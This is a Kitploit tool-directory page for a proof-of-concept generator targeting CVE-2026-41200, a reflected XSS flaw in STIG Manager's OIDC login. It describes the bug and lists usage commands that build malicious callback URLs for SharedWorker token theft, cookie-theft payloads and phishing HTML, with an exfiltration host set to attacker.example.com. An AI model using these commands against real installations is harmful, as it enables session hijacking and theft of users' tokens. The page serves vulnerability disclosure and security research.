Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — Proof-of-concept exploit generator for reflected XSS in STIG Manager OIDC authentication, enabling session token theft via crafted callback URLs and phishing HTML output. | Kitploit
Tools/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Phishing ToolsVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Proof-of-concept exploit generator for reflected XSS in STIG Manager OIDC authentication, enabling session token theft via crafted callback URLs and phishing HTML output.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
42 months agoNot yet reviewed

CVE-2026-41200 — STIG Manager OIDC Reflected XSS PoC

Conceptual Proof of Concept for the reflected Cross-Site Scripting (XSS) vulnerability in STIG Manager versions 1.5.10 through 1.6.7.

Vulnerability Summary

A reflected XSS vulnerability exists in the STIG Manager Web App OIDC authentication error handling code. The error and error_description query parameters returned by the OIDC provider are written directly to the DOM via innerHTML without HTML escaping. An attacker who can craft a malicious URL and convince a user to follow it can execute arbitrary JavaScript in the application context.

The vulnerability is most severe when the targeted user has an active STIG Manager session in another browser tab — injected code can communicate with the SharedWorker managing the access token, enabling authenticated API requests on behalf of the victim.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (HIGH)
  • Affected: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Patched: v1.6.8
  • Advisory: GHSA-wg33-j3rv-jq72
  • Article: hunt-benito.com

Usage

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Disclaimer

This tool is provided for educational purposes and authorised security research only.

  • Only use against installations you own or have explicit authorisation to test.
  • Unauthorised access to computer systems is illegal in most jurisdictions.
  • The authors assume no liability for misuse of this tool.
Download Tool